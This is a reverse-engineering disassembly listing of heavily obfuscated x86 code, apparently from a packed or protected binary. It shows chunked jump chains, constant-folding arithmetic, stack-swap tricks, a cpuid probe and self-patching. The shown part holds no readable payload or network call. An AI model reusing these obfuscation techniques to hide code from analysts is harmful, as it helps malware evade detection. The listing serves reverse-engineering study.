; FUNCTION CHUNK AT 0042D0D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F66D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042F6D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FD7C SIZE 0000000B BYTES
xchg ecx, [esp+4+var_4]
pop ecx
push 0A8DC36C1h
pop eax
rol eax, 0Fh
jmp loc_42D0D0
sub_4268D9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4268EB: ; CODE XREF: _7hdaygc1:loc_429DE7�j
mov ebx, eax
xchg ebx, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_4268F1: ; CODE XREF: sub_4253A0-59E�j
mov eax, [ebp-8]
push edi
push 2A9539D7h
xchg ebp, [esp+0]
jmp loc_42D22D
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
loc_426902: ; CODE XREF: _7hdaygc1:00424AC5�j
xchg edi, [esp]
pushf
push 7844782Fh
pop eax
jmp loc_42B46B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F05
loc_426911: ; CODE XREF: sub_426F05:loc_4271D7�j
call sub_42B650
retn
; END OF FUNCTION CHUNK FOR sub_426F05
; ---------------------------------------------------------------------------
loc_426917: ; CODE XREF: _7hdaygc1:loc_42923E�j
; _7hdaygc1:0042DB3F�j
jo loc_42CB43
push eax
push ebp
pop eax
xchg eax, [esp]
jmp loc_42457E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F72
loc_426928: ; CODE XREF: sub_427F72:loc_42F6B0�j
jnz loc_4256C3
or ebp, edx
and ebx, edi
xchg ebp, [edx]
and eax, edi
jge loc_42D72F
jmp loc_4256C3
; END OF FUNCTION CHUNK FOR sub_427F72
; =============== S U B R O U T I N E =======================================
sub_426941 proc near ; CODE XREF: sub_426303+D�j
; sub_42E43B+16�p
; FUNCTION CHUNK AT 00429B44 SIZE 00000005 BYTES
push ebp
push offset loc_42E315
jmp loc_429B44
sub_426941 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_178. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B63
loc_42694D: ; CODE XREF: sub_424B63+7C2F�j
jmp nullsub_47
; END OF FUNCTION CHUNK FOR sub_424B63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42524F
loc_426952: ; CODE XREF: sub_42524F:loc_42B64B�j
inc ds:dword_42B9A0
lea eax, nullsub_1
mov byte ptr [eax], 0C3h
call nullsub_2
push edi
push 68893D68h
jmp loc_425BF7
; END OF FUNCTION CHUNK FOR sub_42524F
; ---------------------------------------------------------------------------
loc_426971: ; CODE XREF: _7hdaygc1:0042395A�j
retn
; ---------------------------------------------------------------------------
loc_426972: ; CODE XREF: _7hdaygc1:00426D4F�j
jl loc_4290EA
; =============== S U B R O U T I N E =======================================
sub_426978 proc near ; CODE XREF: sub_42EB0D-ADAD�p
; FUNCTION CHUNK AT 0042FCE7 SIZE 00000011 BYTES
xchg edi, [esp+0]
pop edi
add esi, 83169D9Ah
mov [esi], eax
pop esi
push 0A2C9DC2Fh
pop eax
jmp loc_42FCE7
sub_426978 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_426990: ; CODE XREF: _7hdaygc1:loc_42E80E�j
retn
; ---------------------------------------------------------------------------
loc_426991: ; CODE XREF: _7hdaygc1:0042CC40�j
jmp loc_42F793
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DAD9
loc_426996: ; CODE XREF: sub_42DAD9-785E�j
jmp loc_4281DA
; END OF FUNCTION CHUNK FOR sub_42DAD9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_42699B: ; CODE XREF: sub_425F27+5536�j
sub edx, 0CC9A7677h
cmp edx, 0E370AA33h
jmp loc_4299EF
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_4269AC: ; CODE XREF: sub_42C16F:loc_429830�j
mov ebp, esp
push esi
mov esi, ecx
xchg esi, [esp+0]
mov esp, ebp
jmp loc_426BBF
; END OF FUNCTION CHUNK FOR sub_42C16F
; =============== S U B R O U T I N E =======================================
sub_4269BB proc near ; CODE XREF: sub_427CC6:loc_427CD2�p
; _7hdaygc1:0042B96A�j
; FUNCTION CHUNK AT 004267F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004293F0 SIZE 00000011 BYTES
xchg edx, [esp+0]
pop edx
mov edx, [ebx+ecx]
xor edx, [ebx+ecx+4]
jmp loc_4293F0
sub_4269BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4269CB proc near ; DATA XREF: _7hdaygc1:0042C5F1�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424BE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042521E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426174 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042A691 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042CF89 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042DE2A SIZE 0000000A BYTES
mov eax, [eax]
or eax, eax
jnz loc_42DE2A
jmp loc_42521E
sub_4269CB endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_139. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_4269DB: ; CODE XREF: sub_423410:loc_42D81A�j
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_42E54C
or eax, eax
jnz loc_42DACA
jmp loc_424CEC
; END OF FUNCTION CHUNK FOR sub_423410
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_4269F4: ; CODE XREF: sub_423DFC:loc_429850�j
; sub_423DFC+93AD�j
add dword ptr [ebp-4], 4
push 0EDFE81BCh
pop eax
or eax, 7AFA9C57h
add eax, 6B11D1DDh
xor eax, 9DBAB08Bh
loc_426A10: ; CODE XREF: _7hdaygc1:0042C8C6�j
jmp loc_42A705
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429412
loc_426A15: ; CODE XREF: sub_429412+1D�j
rol ebx, 15h
jmp loc_42C560
; END OF FUNCTION CHUNK FOR sub_429412
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A92E
loc_426A1D: ; CODE XREF: sub_42A92E-5F2C�j
sbb edi, 54AA0F68h
add edx, 0B691937Ch
cmp ecx, eax
jmp loc_42ED9E
; END OF FUNCTION CHUNK FOR sub_42A92E
; ---------------------------------------------------------------------------
ror edi, 0Ah
jmp loc_424D5F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_179. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_426A39 proc near ; CODE XREF: sub_42D84A-F93�p
; sub_4268D9+94A9�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423067 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423929 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428C31 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428FC8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042AB52 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042B831 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042D94B SIZE 00000021 BYTES
xchg ebx, [esp+0]
pop ebx
push 54C026DAh
pop esi
and esi, 0EAAF7169h
call sub_428E3C
loc_426A4E: ; CODE XREF: _7hdaygc1:loc_429101�j
call sub_42C369
loc_426A53: ; CODE XREF: sub_42C67D+5�j
jmp loc_428FC8
sub_426A39 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_426A58: ; CODE XREF: sub_42BAE7-274C�j
jmp loc_42D183
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_426A5D: ; CODE XREF: sub_425C3B+F�j
jmp loc_42F7C9
; END OF FUNCTION CHUNK FOR sub_425C3B
; =============== S U B R O U T I N E =======================================
sub_426A62 proc near ; CODE XREF: sub_428B11+299D�j
; FUNCTION CHUNK AT 00426281 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426F6C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004272DA SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00428D63 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042BD15 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042CBEA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042DC31 SIZE 00000005 BYTES
add esp, 0FFFFFFF4h
mov [ebp-8], edx
mov [ebp-4], eax
mov eax, offset dword_42BC4C
call sub_427D8E
jmp loc_42CBEA
sub_426A62 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test eax, eax
jnz loc_423C62
jmp loc_42EA96
; ---------------------------------------------------------------------------
loc_426A87: ; DATA XREF: _7hdaygc1:004257BB�o
push 0FDE1B202h
pop esi
sub esi, 6574A284h
add esi, 0A289DB7Ch
jmp loc_4242A7
; ---------------------------------------------------------------------------
loc_426A9E: ; CODE XREF: _7hdaygc1:loc_42B46B�j
rol eax, 18h
xor eax, 4A3FAD0Fh
add eax, ebp
add eax, 9AB81685h
mov eax, [eax]
popf
jmp loc_4288F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_426AB7: ; CODE XREF: sub_4291EA:loc_42F9C3�j
pop ebp
mov eax, ds:dword_42E544
or eax, eax
jnz loc_42863C
jmp loc_4230C2
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB24
loc_426ACB: ; CODE XREF: sub_42EB24-3559�j
add eax, [ebp-4]
add eax, 18h
; END OF FUNCTION CHUNK FOR sub_42EB24
; START OF FUNCTION CHUNK FOR sub_42EB0D
loc_426AD1: ; CODE XREF: sub_42EB0D+12�j
mov [ebp-10h], eax
mov eax, [ebp-10h]
jmp loc_424440
; END OF FUNCTION CHUNK FOR sub_42EB0D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_186. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E0C4
loc_426ADD: ; CODE XREF: sub_42E0C4+19�j
jmp loc_42DF1A
; END OF FUNCTION CHUNK FOR sub_42E0C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42837F
loc_426AE2: ; CODE XREF: sub_42837F-20A4�j
jmp nullsub_95
; END OF FUNCTION CHUNK FOR sub_42837F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D5F1
loc_426AE7: ; CODE XREF: sub_42D5F1-9082�j
jmp nullsub_118
; END OF FUNCTION CHUNK FOR sub_42D5F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EE8A
loc_426AEC: ; CODE XREF: sub_42EE8A-7D58�j
add eax, ebp
push ecx
push 34566A51h
pop ecx
sub ecx, 0D5BF0BB9h
or ecx, 29F8D9E2h
xor ecx, 76C7A724h
add ecx, 0BDAB6266h
jmp loc_428580
; END OF FUNCTION CHUNK FOR sub_42EE8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272FB
loc_426B12: ; CODE XREF: sub_4272FB:loc_424935�j
xchg ebx, [esp+0]
jmp sub_42D757
; END OF FUNCTION CHUNK FOR sub_4272FB
; =============== S U B R O U T I N E =======================================
sub_426B1A proc near ; CODE XREF: sub_427CC6-1ED5�p
; _7hdaygc1:0042F54F�j
; FUNCTION CHUNK AT 0042ADA7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042B10C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E3D0 SIZE 0000000A BYTES
xchg ecx, [esp+0]
pop ecx
jz loc_42ADA7
cmp eax, 0FFFFFFFFh
jz loc_42ADA7
jmp loc_42B10C
sub_426B1A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E76
loc_426B32: ; CODE XREF: sub_427E76+1811�j
add esi, 0D02290FAh
xchg esi, [esp+4+var_4]
jmp sub_428C3B
; END OF FUNCTION CHUNK FOR sub_427E76
; ---------------------------------------------------------------------------
loc_426B40: ; CODE XREF: _7hdaygc1:0042AA25�j
jz loc_42DEC4
test ebp, 0B4771E12h
jmp loc_42C822
; ---------------------------------------------------------------------------
sbb ecx, 231B50A2h
test eax, 653721D4h
jmp loc_42DBA8
; =============== S U B R O U T I N E =======================================
sub_426B62 proc near ; CODE XREF: _7hdaygc1:00424F24�j
; sub_42EBB3+6�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042CB96 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push 6941BC48h
pop ecx
sub ecx, 5288EAB9h
add ecx, 0E98A0829h
xchg ecx, [esp-4+arg_0]
jmp loc_42CB96
sub_426B62 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_426B80: ; CODE XREF: sub_423172+526�j
jnz loc_425C8F
or edx, 1F848B5Eh
jmp loc_425C8D
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
loc_426B91: ; CODE XREF: _7hdaygc1:0042864A�j
jl loc_42DFB0
and esi, 0BDDC9C18h
jmp loc_429A9C
; ---------------------------------------------------------------------------
loc_426BA2: ; DATA XREF: sub_42E1F1-21C0�o
jnz loc_42EAE2
mov eax, [ebp-4]
jmp loc_424B7C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F1C6
loc_426BB0: ; CODE XREF: sub_42F1C6:loc_42A5DD�j
mov eax, [ebp-4]
call sub_427186
test al, al
call sub_424B63
; END OF FUNCTION CHUNK FOR sub_42F1C6
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_426BBF: ; CODE XREF: sub_42C16F-57B9�j
jmp loc_428A43
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
loc_426BC4: ; CODE XREF: _7hdaygc1:00428CBC�j
xor edx, esi
jmp loc_42E4D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_426BCB: ; CODE XREF: sub_425E64+3621�j
add eax, ebp
push ecx
push 641603A2h
pop ecx
and ecx, 0A2FFEE8Bh
jmp loc_429B58
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AA8
loc_426BDF: ; CODE XREF: sub_424AA8+381E�j
pop ecx
adc edx, ebp
jmp loc_428794
; END OF FUNCTION CHUNK FOR sub_424AA8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C26B
loc_426BE7: ; CODE XREF: sub_42C26B-1B7D�j
call sub_426130
; END OF FUNCTION CHUNK FOR sub_42C26B
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_426BEC: ; CODE XREF: sub_4253A0-1BCB�j
jmp loc_4237F0
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
loc_426BF1: ; CODE XREF: _7hdaygc1:00423C01�j
js loc_426496
; =============== S U B R O U T I N E =======================================
sub_426BF7 proc near ; CODE XREF: sub_425BAD:loc_42DCDD�p
; FUNCTION CHUNK AT 0042731D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00427EDD SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00428609 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004293B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C77F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042D0D5 SIZE 0000000F BYTES
xchg edx, [esp+0]
pop edx
add eax, 72EE894Bh
jmp loc_428609
sub_426BF7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_426C06: ; CODE XREF: sub_429318-5977�j
; sub_424E9C+5�j ...
lea eax, [ebp-0Ch]
call sub_42C16F
jns loc_426577
push 3D73E0Bh
pop eax
add eax, 5BEFFC3Dh
xor eax, 2C25B7Eh
jmp loc_42F947
; END OF FUNCTION CHUNK FOR sub_429318
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_150. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8C4
loc_426C2C: ; CODE XREF: sub_42F8C4-4FF0�j
add esi, ebp
add esi, 0A702BAA8h
mov [esi], edx
xchg ecx, [esp+0]
mov esi, ecx
jmp loc_42A494
; END OF FUNCTION CHUNK FOR sub_42F8C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428498
loc_426C40: ; CODE XREF: sub_428498+4AAF�j
jz loc_42BA44
jmp loc_42BD62
; END OF FUNCTION CHUNK FOR sub_428498
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_426C4B: ; CODE XREF: sub_42C7F3-53D�j
jo loc_42DC0D
loc_426C51: ; CODE XREF: sub_42C7F3-72BA�j
or edx, 0B29CC9C0h
add edx, 6C5AA726h
add edx, ebp
add edx, 0E0A878E3h
mov edx, [edx]
push 5E9F5668h
pop eax
jmp loc_42604B
; END OF FUNCTION CHUNK FOR sub_42C7F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42450E
loc_426C72: ; CODE XREF: sub_42450E+11�j
xor eax, 0E72EFB87h
and eax, 50F27BA4h
add eax, ds:4000FBh
xor eax, 0A1D4DBA4h
loc_426C8A: ; CODE XREF: _7hdaygc1:00423EB8�j
add eax, 0E4A1DC95h
jmp loc_42F460
; END OF FUNCTION CHUNK FOR sub_42450E
; ---------------------------------------------------------------------------
mov [eax], ebx
jmp sub_42EB3E
; ---------------------------------------------------------------------------
locret_426C9C: ; CODE XREF: _7hdaygc1:loc_42F5B1�j
retn
; ---------------------------------------------------------------------------
loc_426C9D: ; CODE XREF: _7hdaygc1:00428CDB�j
jmp loc_42CC23
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_426CA2: ; CODE XREF: sub_4288FE+6607�j
; sub_4288FE:loc_42F69C�j
push 0
push eax
push 8548189Fh
xchg ecx, [esp+0Ch+var_C]
mov eax, ecx
pop ecx
jmp loc_42648E
; END OF FUNCTION CHUNK FOR sub_4288FE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_37. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCDD
loc_426CB6: ; CODE XREF: sub_42CCDD+A�j
jmp loc_42DA37
; END OF FUNCTION CHUNK FOR sub_42CCDD
; =============== S U B R O U T I N E =======================================
sub_426CBB proc near ; CODE XREF: sub_424AE1-1084�p
; _7hdaygc1:0042414A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423F84 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042E6DB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042FC3C SIZE 00000008 BYTES
jns loc_42FC3C
push ebp
mov ebp, esp
push esi
mov esi, ecx
jmp loc_423F84
sub_426CBB endp
; ---------------------------------------------------------------------------
loc_426CCC: ; CODE XREF: _7hdaygc1:loc_42E81E�j
push ebx
mov ebx, eax
xchg ebx, [esp]
push 5E5C1A57h
pop eax
and eax, 0C896A4DDh
sub eax, 94C8FE9Fh
jmp loc_42DACF
; ---------------------------------------------------------------------------
loc_426CE9: ; DATA XREF: sub_424F62+3813�o
mov eax, [eax]
or eax, eax
jnz loc_429D06
jmp loc_423239
; ---------------------------------------------------------------------------
loc_426CF8: ; CODE XREF: _7hdaygc1:loc_42854A�j
mov eax, [eax]
push eax
push offset sub_42E0E2
jmp loc_42FCA1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_58. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_426D06: ; CODE XREF: _7hdaygc1:00428EF2�j
jmp loc_429A8B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C2C
loc_426D0B: ; CODE XREF: sub_425C2C-229F�j
jmp loc_423F33
; END OF FUNCTION CHUNK FOR sub_425C2C
; =============== S U B R O U T I N E =======================================
sub_426D10 proc near ; CODE XREF: _7hdaygc1:0042335F�j
; sub_429A26+4C2B�p
; FUNCTION CHUNK AT 00428960 SIZE 0000000E BYTES
xchg esi, [esp+0]
pop esi
mov eax, [ebp+8]
mov eax, [eax-10h]
shr eax, 6
mov [ebp-10h], eax
jmp loc_428960
sub_426D10 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_426D25: ; CODE XREF: sub_424AE1:loc_428DD2�j
ja loc_426681
jmp loc_428022
; END OF FUNCTION CHUNK FOR sub_424AE1
; =============== S U B R O U T I N E =======================================
sub_426D30 proc near ; DATA XREF: sub_428818:loc_428824�o
arg_0 = dword ptr 4
adc edx, [esp+arg_0]
jmp loc_42CB91
sub_426D30 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B63
loc_426D39: ; CODE XREF: sub_424B63:loc_42EAE2�j
mov eax, [ebp-4]
call sub_42D287
call sub_42D16D
locret_426D46: ; CODE XREF: sub_42A052:loc_423B7E�j
retn
; END OF FUNCTION CHUNK FOR sub_424B63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423C08
loc_426D47: ; CODE XREF: sub_423C08+6�j
jmp loc_42D5DB
; END OF FUNCTION CHUNK FOR sub_423C08
; ---------------------------------------------------------------------------
push edi
cmp ecx, ebp
jmp loc_426972
; ---------------------------------------------------------------------------
mov ds:dword_42BC60, eax
jmp loc_429BBE
; ---------------------------------------------------------------------------
loc_426D5E: ; CODE XREF: _7hdaygc1:00426FB4�j
add esp, 0FFFFFFF4h
push ebx
push esi
push 0AF0E3B4h
pop esi
sub esi, 58B7E14Dh
jmp loc_423E48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E94F
loc_426D74: ; CODE XREF: sub_42E94F+11�j
push 75B03573h
xchg ebp, [esp+4+var_4]
mov eax, ebp
pop ebp
sub eax, 1BE9B198h
add eax, 92DECD1Dh
jmp loc_425F8C
; END OF FUNCTION CHUNK FOR sub_42E94F
; ---------------------------------------------------------------------------
xchg ecx, [edx]
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_426D92: ; CODE XREF: sub_4291EA:loc_42C2C6�j
jmp loc_42D594
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
pushf
jmp sub_42F8F6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD11
loc_426D9D: ; CODE XREF: sub_42FD11+D�j
jnz loc_42EC3C
jmp loc_429E18
; END OF FUNCTION CHUNK FOR sub_42FD11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42986C
loc_426DA8: ; CODE XREF: sub_42986C+3A6B�j
; DATA XREF: sub_42AA9B:loc_42D2C2�o
push esi
mov esi, edi
xchg esi, [esp+0]
push 7506DC97h
jmp loc_429F29
; END OF FUNCTION CHUNK FOR sub_42986C
; ---------------------------------------------------------------------------
locret_426DB8: ; CODE XREF: _7hdaygc1:loc_425148�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CFDA
loc_426DB9: ; CODE XREF: sub_42CFDA-36FB�j
jmp loc_4296A7
; END OF FUNCTION CHUNK FOR sub_42CFDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260B4
loc_426DBE: ; CODE XREF: sub_4260B4+D�j
jmp loc_42DC9E
; END OF FUNCTION CHUNK FOR sub_4260B4
; ---------------------------------------------------------------------------
loc_426DC3: ; CODE XREF: _7hdaygc1:00423C9A�j
jmp loc_428BAE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42874A
loc_426DC8: ; CODE XREF: sub_42874A+EEF�j
or ebp, eax
cdq
loc_426DCB: ; CODE XREF: _7hdaygc1:0042B405�j
rol esi, 7
add esi, 7B6700FFh
jmp loc_42676E
; END OF FUNCTION CHUNK FOR sub_42874A
; =============== S U B R O U T I N E =======================================
sub_426DD9 proc near ; DATA XREF: sub_4242E0+59D2�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042DDB0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E91B SIZE 0000001E BYTES
push ebx
pushf
push 7B3407DAh
pop ebx
jmp loc_42DDB0
sub_426DD9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED4E
loc_426DE6: ; CODE XREF: sub_42ED4E+6�j
xor edx, edx
cpuid
add [esi], eax
xor [esi], ebx
add [esi], ecx
jmp loc_4284F3
; END OF FUNCTION CHUNK FOR sub_42ED4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424359
loc_426DF5: ; CODE XREF: sub_424359+10�j
add ecx, 3BF25787h
xchg ecx, [esp+8+var_8]
jmp loc_428215
; END OF FUNCTION CHUNK FOR sub_424359
; ---------------------------------------------------------------------------
loc_426E03: ; CODE XREF: _7hdaygc1:loc_428A5E�j
pop ebx
add ebx, 6710962Fh
and ebx, 0FEAC36FBh
sub ebx, 8E5DCEABh
xor ebx, 2D916AEDh
add ebx, ebp
jmp loc_4294DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_426E23: ; CODE XREF: sub_42E283:loc_42E2F6�j
jnz loc_4243A0
jmp loc_42989F
; END OF FUNCTION CHUNK FOR sub_42E283
; =============== S U B R O U T I N E =======================================
sub_426E2E proc near ; DATA XREF: sub_42CFDA+2C49�o
; FUNCTION CHUNK AT 00424D2D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00428D1A SIZE 00000016 BYTES
add edx, 0E2A2816Ah
add edx, ebp
add edx, 0FA37DD80h
mov edx, [edx]
jmp loc_428D1A
sub_426E2E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C2C
loc_426E43: ; CODE XREF: sub_425C2C+4DD0�j
ror ebx, 17h
jmp loc_424BDD
; END OF FUNCTION CHUNK FOR sub_425C2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5B
loc_426E4B: ; CODE XREF: sub_428B5B+9�j
add eax, 28h
mov [ebp-4], eax
call sub_425FCB
loc_426E56: ; CODE XREF: sub_424E9C+58AF�j
jmp loc_4251A5
; END OF FUNCTION CHUNK FOR sub_428B5B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB83
loc_426E5B: ; CODE XREF: sub_42BB83-784D�j
jmp loc_42597B
; END OF FUNCTION CHUNK FOR sub_42BB83
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_426E60: ; CODE XREF: sub_423648-497�j
jmp loc_4257CD
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4241F3
loc_426E65: ; CODE XREF: sub_4241F3:loc_4241ED�j
jge loc_42B77C
; END OF FUNCTION CHUNK FOR sub_4241F3
; START OF FUNCTION CHUNK FOR sub_42B470
loc_426E6B: ; CODE XREF: sub_42B470-40E2�j
jmp loc_42F768
; END OF FUNCTION CHUNK FOR sub_42B470
; ---------------------------------------------------------------------------
cmp ebp, 38AA9F52h
jmp loc_42F572
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_426E7B: ; CODE XREF: sub_423648:loc_42D7CF�j
jnz loc_42D112
mov eax, 6
push offset loc_42717B
jmp nullsub_60
; END OF FUNCTION CHUNK FOR sub_423648
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_133. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_426E91: ; CODE XREF: sub_42AFFE-1CED�j
push offset sub_428A03
jmp nullsub_106
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
adc esi, 0BD6CA44Fh
jmp loc_42ADFB
; ---------------------------------------------------------------------------
sbb ebp, 0F10435F1h
and ebx, edx
jmp sub_42ED70
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5B
loc_426EB3: ; CODE XREF: sub_428B5B+279D�j
jp loc_427218
sub eax, ebx
add edi, eax
; END OF FUNCTION CHUNK FOR sub_428B5B
; =============== S U B R O U T I N E =======================================
sub_426EBD proc near ; CODE XREF: sub_428B5B:loc_42C91F�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004235FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004247AB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428B2B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042BDDE SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042E466 SIZE 0000001B BYTES
push ebx
push 6EC426DFh
pop ebx
jmp loc_42BDDE
sub_426EBD endp
; ---------------------------------------------------------------------------
